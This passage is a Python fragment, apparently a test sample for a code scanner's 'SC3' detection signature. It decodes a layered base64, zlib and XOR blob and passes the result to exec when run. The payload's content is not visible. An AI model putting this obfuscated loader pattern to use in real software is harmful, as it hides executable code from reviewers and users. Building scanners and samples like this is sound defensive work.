wr38x6N+kXtBhTJI2CIT3fsXRdqP8slG6w+NaTIjKOc1SCq60fo15LemVBEkIRjv4QRYGzc+j/wk9G1RzYFM/+dbASAHw+4k/udf/thAjg=="
_K = bytes.fromhex("304c1b25a055f79394bf7eff")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
